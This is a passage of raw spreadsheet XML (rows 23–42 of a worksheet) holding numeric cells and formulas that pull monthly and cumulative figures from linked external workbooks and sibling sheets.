      <c r="O23" s="199"/>
      <c r="P23" s="214"/>
      <c r="Q23" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R23" s="209">
        <f>'[13]12'!$W$80</f>
        <v>93.3807669682624</v>
      </c>
      <c r="S23" s="209">
        <f>'[13]12'!$X$80</f>
        <v>84.5661083038236</v>
      </c>
      <c r="T23" s="209">
        <f>'[13]12'!$Y$80</f>
        <v>79.3778964635868</v>
      </c>
      <c r="U23" s="209">
        <f>'[13]12'!$T$80</f>
        <v>41.318287037037</v>
      </c>
      <c r="V23" s="209">
        <f>'[13]12'!$U$80</f>
        <v>43.6336805555556</v>
      </c>
      <c r="W23" s="209">
        <f>'[13]12'!$V$80</f>
        <v>32.8819946210662</v>
      </c>
      <c r="X23" s="209">
        <f>'[13]12'!$Q$80</f>
        <v>9.91638888888889</v>
      </c>
      <c r="Y23" s="209">
        <f>'[13]12'!$R$80</f>
        <v>125.665</v>
      </c>
      <c r="Z23" s="209">
        <f>'[13]12'!$S$80</f>
        <v>2730.52083333333</v>
      </c>
    </row>
    <row r="24" ht="15.75" customHeight="1" spans="1:26">
      <c r="A24" s="191"/>
      <c r="B24" s="193"/>
      <c r="C24" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D24" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E24" s="194"/>
      <c r="F24" s="194">
        <f>'[10]12'!$D$21</f>
        <v>0</v>
      </c>
      <c r="G24" s="194">
        <f>'[10]12'!$E$56</f>
        <v>0</v>
      </c>
      <c r="H24" s="194">
        <f>G24+'11'!H24</f>
        <v>0</v>
      </c>
      <c r="I24" s="194">
        <f>H24+yc!I24</f>
        <v>0</v>
      </c>
      <c r="J24" s="194">
        <f>'[10]12'!$I$56</f>
        <v>2024.91</v>
      </c>
      <c r="K24" s="194">
        <f>J24+'11'!K24</f>
        <v>20561.47</v>
      </c>
      <c r="L24" s="194">
        <f>K24+yc!L24</f>
        <v>300388</v>
      </c>
      <c r="M24" s="194">
        <f>'[10]12'!$L$20</f>
        <v>0</v>
      </c>
      <c r="N24" s="195"/>
      <c r="O24" s="199"/>
      <c r="P24" s="218" t="s">
        <v>262</v>
      </c>
      <c r="Q24" s="193" t="s">
        <v>233</v>
      </c>
      <c r="R24" s="209">
        <f>'[14]12'!$R$6</f>
        <v>81.2307692307692</v>
      </c>
      <c r="S24" s="209">
        <f>'[14]12'!$S$6</f>
        <v>83.7810650887574</v>
      </c>
      <c r="T24" s="209">
        <f>'[14]12'!$T$6</f>
        <v>86.0687337837962</v>
      </c>
      <c r="U24" s="209">
        <f>'[14]12'!$O$6</f>
        <v>67.7083333333333</v>
      </c>
      <c r="V24" s="209">
        <f>'[14]12'!$P$6</f>
        <v>58.6805555555556</v>
      </c>
      <c r="W24" s="209">
        <f>'[14]12'!$Q$6</f>
        <v>52.5399807321773</v>
      </c>
      <c r="X24" s="209">
        <f>'[14]12'!$L$6</f>
        <v>16.25</v>
      </c>
      <c r="Y24" s="209">
        <f>'[14]12'!$M$6</f>
        <v>169</v>
      </c>
      <c r="Z24" s="209">
        <f>'[14]12'!$N$6</f>
        <v>4362.92</v>
      </c>
    </row>
    <row r="25" ht="15.75" customHeight="1" spans="1:26">
      <c r="A25" s="191"/>
      <c r="B25" s="193"/>
      <c r="C25" s="193"/>
      <c r="D25" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E25" s="194"/>
      <c r="F25" s="194"/>
      <c r="G25" s="194">
        <f>'[10]12'!$E$69</f>
        <v>0</v>
      </c>
      <c r="H25" s="194">
        <f>G25+'11'!H25</f>
        <v>0</v>
      </c>
      <c r="I25" s="194">
        <f>H25+yc!I25</f>
        <v>0</v>
      </c>
      <c r="J25" s="194">
        <f>'[10]12'!$I$69</f>
        <v>0</v>
      </c>
      <c r="K25" s="194">
        <f>J25+'11'!K25</f>
        <v>473.78</v>
      </c>
      <c r="L25" s="194">
        <f>K25+yc!L25</f>
        <v>79794.63</v>
      </c>
      <c r="M25" s="194"/>
      <c r="N25" s="195"/>
      <c r="O25" s="199"/>
      <c r="P25" s="219"/>
      <c r="Q25" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R25" s="209">
        <f>'[14]12'!$R$7</f>
        <v>197.52380952381</v>
      </c>
      <c r="S25" s="209">
        <f>'[14]12'!$S$7</f>
        <v>202.530035335689</v>
      </c>
      <c r="T25" s="209">
        <f>'[14]12'!$T$7</f>
        <v>188.079719890108</v>
      </c>
      <c r="U25" s="209">
        <f>'[14]12'!$O$7</f>
        <v>43.75</v>
      </c>
      <c r="V25" s="209">
        <f>'[14]12'!$P$7</f>
        <v>49.1319444444444</v>
      </c>
      <c r="W25" s="209">
        <f>'[14]12'!$Q$7</f>
        <v>50.145472061657</v>
      </c>
      <c r="X25" s="209">
        <f>'[14]12'!$L$7</f>
        <v>10.5</v>
      </c>
      <c r="Y25" s="209">
        <f>'[14]12'!$M$7</f>
        <v>141.5</v>
      </c>
      <c r="Z25" s="209">
        <f>'[14]12'!$N$7</f>
        <v>4164.08</v>
      </c>
    </row>
    <row r="26" ht="15.75" customHeight="1" spans="1:26">
      <c r="A26" s="191"/>
      <c r="B26" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C26" s="193"/>
      <c r="D26" s="193"/>
      <c r="E26" s="194"/>
      <c r="F26" s="194"/>
      <c r="G26" s="194"/>
      <c r="H26" s="194">
        <f>G26+'11'!H26</f>
        <v>0</v>
      </c>
      <c r="I26" s="194">
        <f>H26+yc!I26</f>
        <v>0</v>
      </c>
      <c r="J26" s="194">
        <f>J27+J30</f>
        <v>0</v>
      </c>
      <c r="K26" s="194">
        <f>J26+'11'!K26</f>
        <v>0</v>
      </c>
      <c r="L26" s="194">
        <f>K26+yc!L26</f>
        <v>0</v>
      </c>
      <c r="M26" s="194"/>
      <c r="N26" s="195"/>
      <c r="O26" s="199"/>
      <c r="P26" s="191" t="s">
        <v>263</v>
      </c>
      <c r="Q26" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R26" s="209">
        <f>'[15]12'!$I$38</f>
        <v>0</v>
      </c>
      <c r="S26" s="209">
        <f>'[15]12'!$J$38</f>
        <v>0</v>
      </c>
      <c r="T26" s="209">
        <f>'[15]12'!$K$38</f>
        <v>0</v>
      </c>
      <c r="U26" s="209">
        <f>'[15]12'!$F$38</f>
        <v>0</v>
      </c>
      <c r="V26" s="209">
        <f>'[15]12'!$G$38</f>
        <v>0</v>
      </c>
      <c r="W26" s="209">
        <f>'[15]12'!$H$38</f>
        <v>0</v>
      </c>
      <c r="X26" s="209">
        <f>'[15]12'!$C$38</f>
        <v>0</v>
      </c>
      <c r="Y26" s="209">
        <f>'[15]12'!$D$38</f>
        <v>0</v>
      </c>
      <c r="Z26" s="209">
        <f>'[15]12'!$E$38</f>
        <v>0</v>
      </c>
    </row>
    <row r="27" ht="15.75" customHeight="1" spans="1:26">
      <c r="A27" s="191"/>
      <c r="B27" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C27" s="193"/>
      <c r="D27" s="193"/>
      <c r="E27" s="194">
        <v>190000</v>
      </c>
      <c r="F27" s="194"/>
      <c r="G27" s="194"/>
      <c r="H27" s="194">
        <f>G27+'11'!H27</f>
        <v>0</v>
      </c>
      <c r="I27" s="194">
        <f>H27+yc!I27</f>
        <v>0</v>
      </c>
      <c r="J27" s="194">
        <f>SUM(J28:J29)</f>
        <v>0</v>
      </c>
      <c r="K27" s="194">
        <f>J27+'11'!K27</f>
        <v>0</v>
      </c>
      <c r="L27" s="194">
        <f>K27+yc!L27</f>
        <v>0</v>
      </c>
      <c r="M27" s="194"/>
      <c r="N27" s="195"/>
      <c r="O27" s="220" t="s">
        <v>264</v>
      </c>
      <c r="P27" s="191" t="s">
        <v>237</v>
      </c>
      <c r="Q27" s="191"/>
      <c r="R27" s="209">
        <f>'[11]12'!$W$69</f>
        <v>21.1773481504034</v>
      </c>
      <c r="S27" s="209">
        <f>'[11]12'!$X$69</f>
        <v>22.6860012457178</v>
      </c>
      <c r="T27" s="209">
        <f>'[11]12'!$Y$69</f>
        <v>25.2845753646285</v>
      </c>
      <c r="U27" s="221">
        <f>'[11]12'!$T$69</f>
        <v>100</v>
      </c>
      <c r="V27" s="209">
        <f>'[11]12'!$U$69</f>
        <v>66.7777777777778</v>
      </c>
      <c r="W27" s="209">
        <f>'[11]12'!$V$69</f>
        <v>68.3188824662813</v>
      </c>
      <c r="X27" s="209" t="str">
        <f>'[11]12'!$Q$69</f>
        <v>24.00</v>
      </c>
      <c r="Y27" s="209" t="str">
        <f>'[11]12'!$R$69</f>
        <v>192.32</v>
      </c>
      <c r="Z27" s="209" t="str">
        <f>'[11]12'!$S$69</f>
        <v>5673.20</v>
      </c>
    </row>
    <row r="28" ht="15.75" customHeight="1" spans="1:26">
      <c r="A28" s="191"/>
      <c r="B28" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C28" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D28" s="193"/>
      <c r="E28" s="194"/>
      <c r="F28" s="194"/>
      <c r="G28" s="194"/>
      <c r="H28" s="194">
        <f>G28+'11'!H28</f>
        <v>0</v>
      </c>
      <c r="I28" s="194">
        <f>H28+yc!I28</f>
        <v>0</v>
      </c>
      <c r="J28" s="194"/>
      <c r="K28" s="194">
        <f>J28+'11'!K28</f>
        <v>0</v>
      </c>
      <c r="L28" s="194">
        <f>K28+yc!L28</f>
        <v>0</v>
      </c>
      <c r="M28" s="194"/>
      <c r="N28" s="195"/>
      <c r="O28" s="222"/>
      <c r="P28" s="223" t="s">
        <v>306</v>
      </c>
      <c r="Q28" s="224"/>
      <c r="R28" s="209">
        <f>'[10]12'!$W$104</f>
        <v>0</v>
      </c>
      <c r="S28" s="209">
        <f>'[10]12'!$X$104</f>
        <v>28.3179061602293</v>
      </c>
      <c r="T28" s="209">
        <f>'[10]12'!$Y$104</f>
        <v>26.0491177026315</v>
      </c>
      <c r="U28" s="209">
        <f>'[10]12'!$T$104</f>
        <v>0</v>
      </c>
      <c r="V28" s="209">
        <f>'[10]12'!$U$104</f>
        <v>80.196875</v>
      </c>
      <c r="W28" s="209">
        <f>'[10]12'!$V$104</f>
        <v>64.9207249518304</v>
      </c>
      <c r="X28" s="209">
        <f>'[10]12'!$Q$104</f>
        <v>0</v>
      </c>
      <c r="Y28" s="209">
        <f>'[10]12'!$R$104</f>
        <v>230.967</v>
      </c>
      <c r="Z28" s="209">
        <f>'[10]12'!$S$104</f>
        <v>5391.017</v>
      </c>
    </row>
    <row r="29" ht="15.75" customHeight="1" spans="1:26">
      <c r="A29" s="191"/>
      <c r="B29" s="191"/>
      <c r="C29" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D29" s="193"/>
      <c r="E29" s="194"/>
      <c r="F29" s="194"/>
      <c r="G29" s="194"/>
      <c r="H29" s="194">
        <f>G29+'11'!H29</f>
        <v>0</v>
      </c>
      <c r="I29" s="194">
        <f>H29+yc!I29</f>
        <v>0</v>
      </c>
      <c r="J29" s="194"/>
      <c r="K29" s="194">
        <f>J29+'11'!K29</f>
        <v>0</v>
      </c>
      <c r="L29" s="194">
        <f>K29+yc!L29</f>
        <v>0</v>
      </c>
      <c r="M29" s="225"/>
      <c r="N29" s="195"/>
      <c r="O29" s="222"/>
      <c r="P29" s="223" t="s">
        <v>307</v>
      </c>
      <c r="Q29" s="224"/>
      <c r="R29" s="209">
        <f>'[10]12'!$W$105</f>
        <v>0</v>
      </c>
      <c r="S29" s="209">
        <f>'[10]12'!$X$105</f>
        <v>0</v>
      </c>
      <c r="T29" s="209">
        <f>'[10]12'!$Y$105</f>
        <v>29.9342377123697</v>
      </c>
      <c r="U29" s="209">
        <f>'[10]12'!$T$105</f>
        <v>0</v>
      </c>
      <c r="V29" s="209">
        <f>'[10]12'!$U$105</f>
        <v>0</v>
      </c>
      <c r="W29" s="209">
        <f>'[10]12'!$V$105</f>
        <v>33.7690510597303</v>
      </c>
      <c r="X29" s="209">
        <f>'[10]12'!$Q$105</f>
        <v>0</v>
      </c>
      <c r="Y29" s="209">
        <f>'[10]12'!$R$105</f>
        <v>0</v>
      </c>
      <c r="Z29" s="209">
        <f>'[10]12'!$S$105</f>
        <v>2804.182</v>
      </c>
    </row>
    <row r="30" ht="15.75" customHeight="1" spans="1:26">
      <c r="A30" s="191"/>
      <c r="B30" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C30" s="193"/>
      <c r="D30" s="193"/>
      <c r="E30" s="194"/>
      <c r="F30" s="194"/>
      <c r="G30" s="194"/>
      <c r="H30" s="194">
        <f>G30+'11'!H30</f>
        <v>0</v>
      </c>
      <c r="I30" s="194">
        <f>H30+yc!I30</f>
        <v>0</v>
      </c>
      <c r="J30" s="194"/>
      <c r="K30" s="194">
        <f>J30+'11'!K30</f>
        <v>0</v>
      </c>
      <c r="L30" s="194">
        <f>K30+yc!L30</f>
        <v>0</v>
      </c>
      <c r="M30" s="225"/>
      <c r="N30" s="195"/>
      <c r="O30" s="222"/>
      <c r="P30" s="223" t="s">
        <v>252</v>
      </c>
      <c r="Q30" s="224"/>
      <c r="R30" s="209">
        <f>'[12]12'!$W$72</f>
        <v>0</v>
      </c>
      <c r="S30" s="226">
        <f>'[12]12'!$X$72</f>
        <v>0</v>
      </c>
      <c r="T30" s="209">
        <f>'[12]12'!$Y$72</f>
        <v>0</v>
      </c>
      <c r="U30" s="209">
        <f>'[12]12'!$T$72</f>
        <v>0</v>
      </c>
      <c r="V30" s="209">
        <f>'[12]12'!$U$72</f>
        <v>0</v>
      </c>
      <c r="W30" s="209">
        <f>'[12]12'!$V$72</f>
        <v>0</v>
      </c>
      <c r="X30" s="209">
        <f>'[12]12'!$Q$72</f>
        <v>0</v>
      </c>
      <c r="Y30" s="209">
        <f>'[12]12'!$R$72</f>
        <v>0</v>
      </c>
      <c r="Z30" s="209">
        <f>'[12]12'!$S$72</f>
        <v>0</v>
      </c>
    </row>
    <row r="31" ht="15.75" customHeight="1" spans="1:26">
      <c r="A31" s="191" t="s">
        <v>237</v>
      </c>
      <c r="B31" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C31" s="193"/>
      <c r="D31" s="193"/>
      <c r="E31" s="194">
        <v>150000</v>
      </c>
      <c r="F31" s="194">
        <f>'[11]12'!$D$16</f>
        <v>65429.37</v>
      </c>
      <c r="G31" s="194">
        <f>'[11]12'!$E$16</f>
        <v>4727</v>
      </c>
      <c r="H31" s="194">
        <f>G31+'11'!H31</f>
        <v>57475</v>
      </c>
      <c r="I31" s="194">
        <f>H31+yc!I31</f>
        <v>1430482</v>
      </c>
      <c r="J31" s="194">
        <f>'[11]12'!$I$16</f>
        <v>3673.14</v>
      </c>
      <c r="K31" s="194">
        <f>J31+'11'!K31</f>
        <v>57826.7</v>
      </c>
      <c r="L31" s="194">
        <f>K31+yc!L31</f>
        <v>1413874.83</v>
      </c>
      <c r="M31" s="225">
        <f>'[11]12'!$L$16</f>
        <v>65077.67</v>
      </c>
      <c r="N31" s="195">
        <f>M31/75000*100</f>
        <v>86.7702266666667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'[11]12'!$D$13</f>
        <v>60437.506</v>
      </c>
      <c r="G32" s="194">
        <f>'[11]12'!$E$13</f>
        <v>6569</v>
      </c>
      <c r="H32" s="194">
        <f>G32+'11'!H32</f>
        <v>53555</v>
      </c>
      <c r="I32" s="194">
        <f>H32+yc!I32</f>
        <v>1581398</v>
      </c>
      <c r="J32" s="194">
        <f>'[11]12'!$I$13</f>
        <v>3539</v>
      </c>
      <c r="K32" s="194">
        <f>J32+'11'!K32</f>
        <v>42460</v>
      </c>
      <c r="L32" s="194">
        <f>K32+yc!L32</f>
        <v>1063938</v>
      </c>
      <c r="M32" s="225">
        <f>'[11]12'!$L$13</f>
        <v>69460.016</v>
      </c>
      <c r="N32" s="207">
        <f>(M32+M33)/50000*100</f>
        <v>138.920032</v>
      </c>
      <c r="O32" s="222"/>
      <c r="P32" s="223" t="s">
        <v>308</v>
      </c>
      <c r="Q32" s="224"/>
      <c r="R32" s="209">
        <f>'[13]12'!$W$76</f>
        <v>0</v>
      </c>
      <c r="S32" s="209">
        <f>'[13]12'!$X$76</f>
        <v>0</v>
      </c>
      <c r="T32" s="209">
        <f>'[13]12'!$Y$76</f>
        <v>0</v>
      </c>
      <c r="U32" s="209">
        <f>'[13]12'!$T$76</f>
        <v>4.16666666666667e-11</v>
      </c>
      <c r="V32" s="209">
        <f>'[13]12'!$U$76</f>
        <v>3.81944444444445e-11</v>
      </c>
      <c r="W32" s="209">
        <f>'[13]12'!$V$76</f>
        <v>4.10645472061657e-11</v>
      </c>
      <c r="X32" s="209">
        <f>'[13]12'!$Q$76</f>
        <v>1e-11</v>
      </c>
      <c r="Y32" s="209">
        <f>'[13]12'!$R$76</f>
        <v>1.1e-10</v>
      </c>
      <c r="Z32" s="209">
        <f>'[13]12'!$S$76</f>
        <v>3.41e-9</v>
      </c>
    </row>
    <row r="33" ht="15.75" customHeight="1" spans="1:26">
      <c r="A33" s="191"/>
      <c r="B33" s="193"/>
      <c r="C33" s="193"/>
      <c r="D33" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E33" s="194"/>
      <c r="F33" s="194"/>
      <c r="G33" s="194">
        <f>'[11]12'!$E$14</f>
        <v>0</v>
      </c>
      <c r="H33" s="194">
        <f>G33+'11'!H33</f>
        <v>0</v>
      </c>
      <c r="I33" s="194">
        <f>H33+yc!I33</f>
        <v>0</v>
      </c>
      <c r="J33" s="194">
        <f>'[11]12'!$I$14</f>
        <v>0</v>
      </c>
      <c r="K33" s="194">
        <f>J33+'11'!K33</f>
        <v>0</v>
      </c>
      <c r="L33" s="194">
        <f>K33+yc!L33</f>
        <v>0</v>
      </c>
      <c r="M33" s="225">
        <f>'[11]12'!$L$14</f>
        <v>0</v>
      </c>
      <c r="N33" s="212"/>
      <c r="O33" s="222"/>
      <c r="P33" s="223" t="s">
        <v>309</v>
      </c>
      <c r="Q33" s="224"/>
      <c r="R33" s="209">
        <f>'[13]12'!$W$77</f>
        <v>0</v>
      </c>
      <c r="S33" s="209">
        <f>'[13]12'!$X$77</f>
        <v>0</v>
      </c>
      <c r="T33" s="209">
        <f>'[13]12'!$Y$77</f>
        <v>19.77</v>
      </c>
      <c r="U33" s="209">
        <f>'[13]12'!$T$77</f>
        <v>4.16666666666667e-11</v>
      </c>
      <c r="V33" s="209">
        <f>'[13]12'!$U$77</f>
        <v>3.47222222222222e-12</v>
      </c>
      <c r="W33" s="209">
        <f>'[13]12'!$V$77</f>
        <v>60.9323217726411</v>
      </c>
      <c r="X33" s="209">
        <f>'[13]12'!$Q$77</f>
        <v>1e-11</v>
      </c>
      <c r="Y33" s="209">
        <f>'[13]12'!$R$77</f>
        <v>1e-11</v>
      </c>
      <c r="Z33" s="209">
        <f>'[13]12'!$S$77</f>
        <v>5059.82000000012</v>
      </c>
    </row>
    <row r="34" ht="15.75" customHeight="1" spans="1:26">
      <c r="A34" s="191"/>
      <c r="B34" s="193"/>
      <c r="C34" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D34" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E34" s="194"/>
      <c r="F34" s="194"/>
      <c r="G34" s="194">
        <f>'[11]12'!$E$50</f>
        <v>0</v>
      </c>
      <c r="H34" s="194">
        <f>G34+'11'!H34</f>
        <v>0</v>
      </c>
      <c r="I34" s="194">
        <f>H34+yc!I34</f>
        <v>0</v>
      </c>
      <c r="J34" s="194">
        <f>'[11]12'!$I$50</f>
        <v>1405.6</v>
      </c>
      <c r="K34" s="194">
        <f>J34+'11'!K34</f>
        <v>2072.49</v>
      </c>
      <c r="L34" s="194">
        <f>K34+yc!L34</f>
        <v>469275.42</v>
      </c>
      <c r="M34" s="225">
        <f>'[11]12'!$L$15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'[11]12'!$E$64</f>
        <v>0</v>
      </c>
      <c r="H35" s="194">
        <f>G35+'11'!H35</f>
        <v>0</v>
      </c>
      <c r="I35" s="194">
        <f>H35+yc!I35</f>
        <v>0</v>
      </c>
      <c r="J35" s="194">
        <f>'[11]12'!$I$64</f>
        <v>0</v>
      </c>
      <c r="K35" s="194">
        <f>J35+'11'!K35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G36+'11'!H36</f>
        <v>0</v>
      </c>
      <c r="I36" s="194">
        <f>H36+yc!I36</f>
        <v>0</v>
      </c>
      <c r="J36" s="194">
        <f>J37+J40</f>
        <v>0</v>
      </c>
      <c r="K36" s="194">
        <f>J36+'11'!K36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G37+'11'!H37</f>
        <v>0</v>
      </c>
      <c r="I37" s="194">
        <f>H37+yc!I37</f>
        <v>0</v>
      </c>
      <c r="J37" s="194">
        <f>SUM(J38:J39)</f>
        <v>0</v>
      </c>
      <c r="K37" s="194">
        <f>J37+'11'!K37</f>
        <v>0</v>
      </c>
      <c r="L37" s="194">
        <f>K37+yc!L37</f>
        <v>0</v>
      </c>
      <c r="M37" s="225"/>
      <c r="N37" s="195"/>
      <c r="O37" s="197" t="s">
        <v>268</v>
      </c>
      <c r="P37" s="218" t="s">
        <v>229</v>
      </c>
      <c r="Q37" s="191" t="s">
        <v>277</v>
      </c>
      <c r="R37" s="231">
        <f>'[10]12'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S37" s="232">
        <f>'[10]12'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T37" s="233">
        <f>'[10]12'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U37" s="234">
        <f>T37+'11'!U37</f>
        <v>0</v>
      </c>
      <c r="V37" s="234">
        <f>U37+yc!V37</f>
        <v>0</v>
      </c>
      <c r="W37" s="235">
        <f>'[10]12'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X37" s="234">
        <f>W37+'11'!X37</f>
        <v>0</v>
      </c>
      <c r="Y37" s="235">
        <f>X37+yc!Y37</f>
        <v>0</v>
      </c>
      <c r="Z37" s="235">
        <f>'[10]12'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="38" ht="15.75" customHeight="1" spans="1:26">
      <c r="A38" s="191"/>
      <c r="B38" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C38" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D38" s="193"/>
      <c r="E38" s="194"/>
      <c r="F38" s="194"/>
      <c r="G38" s="225"/>
      <c r="H38" s="194">
        <f>G38+'11'!H38</f>
        <v>0</v>
      </c>
      <c r="I38" s="194">
        <f>H38+yc!I38</f>
        <v>0</v>
      </c>
      <c r="J38" s="194"/>
      <c r="K38" s="194">
        <f>J38+'11'!K38</f>
        <v>0</v>
      </c>
      <c r="L38" s="194">
        <f>K38+yc!L38</f>
        <v>0</v>
      </c>
      <c r="M38" s="194"/>
      <c r="N38" s="195"/>
      <c r="O38" s="200"/>
      <c r="P38" s="236"/>
      <c r="Q38" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R38" s="237">
        <f>'[10]12'!$P$10</f>
        <v>0</v>
      </c>
      <c r="S38" s="235">
        <f>'[10]12'!$Q$10</f>
        <v>9645.331</v>
      </c>
      <c r="T38" s="235">
        <f>'[10]12'!$R$10</f>
        <v>0</v>
      </c>
      <c r="U38" s="234">
        <f>T38+'11'!U38</f>
        <v>5520.34</v>
      </c>
      <c r="V38" s="234">
        <f>U38+yc!V38</f>
        <v>264660.06</v>
      </c>
      <c r="W38" s="235">
        <f>'[10]12'!$V$10</f>
        <v>0</v>
      </c>
      <c r="X38" s="234">
        <f>W38+'11'!X38</f>
        <v>7808</v>
      </c>
      <c r="Y38" s="235">
        <f>X38+yc!Y38</f>
        <v>263915</v>
      </c>
      <c r="Z38" s="235">
        <f>'[10]12'!$Y$10</f>
        <v>7357.671</v>
      </c>
    </row>
    <row r="39" ht="15.75" customHeight="1" spans="1:26">
      <c r="A39" s="191"/>
      <c r="B39" s="191"/>
      <c r="C39" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D39" s="193"/>
      <c r="E39" s="194"/>
      <c r="F39" s="194"/>
      <c r="G39" s="194"/>
      <c r="H39" s="194">
        <f>G39+'11'!H39</f>
        <v>0</v>
      </c>
      <c r="I39" s="194">
        <f>H39+yc!I39</f>
        <v>0</v>
      </c>
      <c r="J39" s="194"/>
      <c r="K39" s="194">
        <f>J39+'11'!K39</f>
        <v>0</v>
      </c>
      <c r="L39" s="194">
        <f>K39+yc!L39</f>
        <v>0</v>
      </c>
      <c r="M39" s="194"/>
      <c r="N39" s="195"/>
      <c r="O39" s="200"/>
      <c r="P39" s="236"/>
      <c r="Q39" s="191" t="s">
        <v>279</v>
      </c>
      <c r="R39" s="231">
        <f>'[10]12'!$P$50</f>
        <v>0</v>
      </c>
      <c r="S39" s="232">
        <f>'[10]12'!$Q$50</f>
        <v>1231.546</v>
      </c>
      <c r="T39" s="238">
        <f>'[10]12'!$R$50</f>
        <v>44.02</v>
      </c>
      <c r="U39" s="234">
        <f>T39+'11'!U39</f>
        <v>3477.2</v>
      </c>
      <c r="V39" s="234">
        <f>U39+yc!V39</f>
        <v>82290.799</v>
      </c>
      <c r="W39" s="235">
        <f>'[10]12'!$V$50</f>
        <v>319</v>
      </c>
      <c r="X39" s="234">
        <f>W39+'11'!X39</f>
        <v>3539</v>
      </c>
      <c r="Y39" s="235">
        <f>X39+yc!Y39</f>
        <v>82298</v>
      </c>
      <c r="Z39" s="238">
        <f>'[10]12'!$Y$50</f>
        <v>1169.746</v>
      </c>
    </row>
    <row r="40" ht="15.75" customHeight="1" spans="1:26">
      <c r="A40" s="191"/>
      <c r="B40" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C40" s="193"/>
      <c r="D40" s="193"/>
      <c r="E40" s="194"/>
      <c r="F40" s="194"/>
      <c r="G40" s="225"/>
      <c r="H40" s="194">
        <f>G40+'11'!H40</f>
        <v>0</v>
      </c>
      <c r="I40" s="194">
        <f>H40+yc!I40</f>
        <v>0</v>
      </c>
      <c r="J40" s="194"/>
      <c r="K40" s="194">
        <f>J40+'11'!K40</f>
        <v>0</v>
      </c>
      <c r="L40" s="194">
        <f>K40+yc!L40</f>
        <v>0</v>
      </c>
      <c r="M40" s="194"/>
      <c r="N40" s="195"/>
      <c r="O40" s="200"/>
      <c r="P40" s="219"/>
      <c r="Q40" s="191" t="s">
        <v>280</v>
      </c>
      <c r="R40" s="239">
        <f>'[10]12'!$P$44</f>
        <v>0</v>
      </c>
      <c r="S40" s="240">
        <f>'[10]12'!$Q$44</f>
        <v>0</v>
      </c>
      <c r="T40" s="238">
        <f>'[10]12'!$R$44</f>
        <v>0</v>
      </c>
      <c r="U40" s="234">
        <f>'[10]12'!$S$44</f>
        <v>0</v>
      </c>
      <c r="V40" s="234">
        <f>'[10]12'!$T$44</f>
        <v>0</v>
      </c>
      <c r="W40" s="235">
        <f>'[10]12'!$V$44</f>
        <v>0</v>
      </c>
      <c r="X40" s="234">
        <f>'[10]12'!$W$44</f>
        <v>0</v>
      </c>
      <c r="Y40" s="235">
        <f>'[10]12'!$X$44</f>
        <v>0</v>
      </c>
      <c r="Z40" s="238">
        <f>'[10]12'!$Y$44</f>
        <v>0</v>
      </c>
    </row>
    <row r="41" ht="15.75" customHeight="1" spans="1:26">
      <c r="A41" s="191" t="s">
        <v>252</v>
      </c>
      <c r="B41" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C41" s="193"/>
      <c r="D41" s="193"/>
      <c r="E41" s="194">
        <v>12000</v>
      </c>
      <c r="F41" s="194">
        <f>'[12]12'!$D$16</f>
        <v>26129.76</v>
      </c>
      <c r="G41" s="225">
        <f>'[12]12'!$E$16</f>
        <v>0</v>
      </c>
      <c r="H41" s="194">
        <f>G41+'11'!H41</f>
        <v>4334</v>
      </c>
      <c r="I41" s="194">
        <f>H41+yc!I41</f>
        <v>129310</v>
      </c>
      <c r="J41" s="194">
        <f>'[12]12'!$I$16</f>
        <v>685.95</v>
      </c>
      <c r="K41" s="194">
        <f>J41+'11'!K41</f>
        <v>7185.19</v>
      </c>
      <c r="L41" s="194">
        <f>K41+yc!L41</f>
        <v>128578.73</v>
      </c>
      <c r="M41" s="194">
        <f>'[12]12'!$L$16</f>
        <v>23278.57</v>
      </c>
      <c r="N41" s="195">
        <f>M41/30000*100</f>
        <v>77.5952333333333</v>
      </c>
      <c r="O41" s="200"/>
      <c r="P41" s="213" t="s">
        <v>237</v>
      </c>
      <c r="Q41" s="191" t="s">
        <v>277</v>
      </c>
      <c r="R41" s="239">
        <f>'[11]12'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S41" s="240">
        <f>'[11]12'!$Q$7</f>
        <v>0.621</v>
      </c>
      <c r="T41" s="238">
        <f>'[11]12'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U41" s="234">
        <f>T41+'11'!U41</f>
        <v>0</v>
      </c>
      <c r="V41" s="234">
        <f>U41+yc!V41</f>
        <v>0.621000000000095</v>
      </c>
      <c r="W41" s="235">
        <f>'[11]12'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X41" s="234">
        <f>W41+'11'!X41</f>
        <v>0</v>
      </c>
      <c r="Y41" s="235">
        <f>X41+yc!Y41</f>
        <v>9.45910016980633e-14</v>
      </c>
      <c r="Z41" s="238">
        <f>'[11]12'!$Y$7</f>
        <v>0.621</v>
      </c>
    </row>
    <row r="42" ht="15.75" customHeight="1" spans="1:26">
      <c r="A42" s="191"/>
      <c r="B42" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C42" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D42" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E42" s="194">
        <v>0</v>
      </c>
      <c r="F42" s="194">
        <f>'[12]12'!$D$13</f>
        <v>0</v>
      </c>
      <c r="G42" s="225">
        <f>'[12]12'!$E$13</f>
        <v>0</v>
      </c>
      <c r="H42" s="194">
        <f>G42+'11'!H42</f>
        <v>0</v>
      </c>
